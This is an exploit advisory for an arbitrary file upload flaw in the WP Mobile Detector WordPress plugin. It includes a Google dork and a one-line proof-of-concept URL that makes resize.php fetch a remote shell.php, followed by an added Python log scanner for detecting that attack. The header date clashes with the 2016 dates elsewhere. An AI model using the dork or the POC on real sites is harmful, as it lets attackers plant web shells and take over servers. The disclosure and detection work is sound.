#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File Upload
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
#Date: 1-06-2015
#Exploit Author: Aaditya Purani
#Author Details: https://aadityapurani.com
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
#Version: 3.5
#Tested on: Kali Linux 2.0 Sana / Windows 10

This vulnerability was disclosed to the public yesterday: WP Mobile Detector Arbitrary File Upload for version <=3.5, in which an attacker can upload malicious PHP files (shell) into the website. Over 10,000 users are affected. The vendor has released a patch in versions 3.6 & 3.7 at https://wordpress.org/plugins/wp-mobile-detector/changelog/ .

I have written a complete POC post: WP Mobile Detector Vulnerability <= 3.5 Exploit POC
https://aadityapurani.com/2016/06/03/mobile-detector-poc/

I have made a POC video here: https://www.youtube.com/watch?v=ULE1AVWfHTU

Simple POC:

Go to: [wordpress sitepath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]

and it will get saved in directory: /wp-content/plugins/wp-mobile-detector/cache/shell.php
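As an added example that is not part of the advisory or of the plugin's own code, the Python script below shows how a site operator could look for the pattern described above in a web server access log: requests to resize.php whose src parameter points at an off-site URL, and requests that execute PHP files out of the plugin's cache directory (which should only ever hold resized images). The plugin path, the resize.php script, the src parameter and the cache directory come from the advisory; the log lines, IP addresses and file names are constructed samples.

```python
"""
Log-based detection for the WP Mobile Detector resize.php issue described in
the advisory. Added example; not code from the advisory author or the plugin.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed Apache combined-format log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jun/2016:10:12:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://198.51.100.9/shell.php HTTP/1.1" 200 512 "-" "curl/7.47.0"
198.51.100.22 - - [01/Jun/2016:10:12:05 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/2016/05/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.4 - - [01/Jun/2016:10:13:41 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/shell.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.0.2.5 - - [01/Jun/2016:10:14:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Plugin location as given in the advisory.
PLUGIN_PATH = "/wp-content/plugins/wp-mobile-detector/"

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding label for one parsed entry, or None if it looks benign."""
    parsed = urlparse(entry["target"])
    path = parsed.path
    if path == PLUGIN_PATH + "resize.php":
        src = unquote(parse_qs(parsed.query).get("src", [""])[0])
        src_url = urlparse(src)
        # resize.php being asked to fetch a file from another host is the
        # vector the advisory describes; a local image path is normal use.
        if src_url.scheme in ("http", "https", "ftp") or src_url.netloc:
            return "remote-fetch"
        return None
    if path.startswith(PLUGIN_PATH + "cache/") and path.lower().endswith(".php"):
        # The cache directory should only serve images, so a .php request
        # there indicates a file has already been planted and is being run.
        return "cache-php-exec"
    return None


def scan_log(text):
    """Scan a log text and return (ip, label, target) tuples for flagged requests."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            findings.append((entry["ip"], label, entry["target"]))
    return findings


def suspicious_cache_files(names):
    """Given file names from the plugin cache directory, return any that are not images."""
    image_suffixes = (".jpg", ".jpeg", ".png", ".gif")
    return [n for n in names if not n.lower().endswith(image_suffixes)]


if __name__ == "__main__":
    for ip, label, target in scan_log(SAMPLE_LOG):
        print(f"{label:16} {ip:15} {target}")
    # Constructed directory listing; anything not an image deserves a look.
    print(suspicious_cache_files(["a1b2.jpg", "shell.php", "x.png", "img.phtml"]))
```

Run it as-is to see the two flagged requests from the sample log; on a real site, feed it the access log and pair the log findings with a listing of the cache directory, since a remote-fetch request with a 200 status followed by a hit on cache/<name>.php is the sequence the advisory's POC produces.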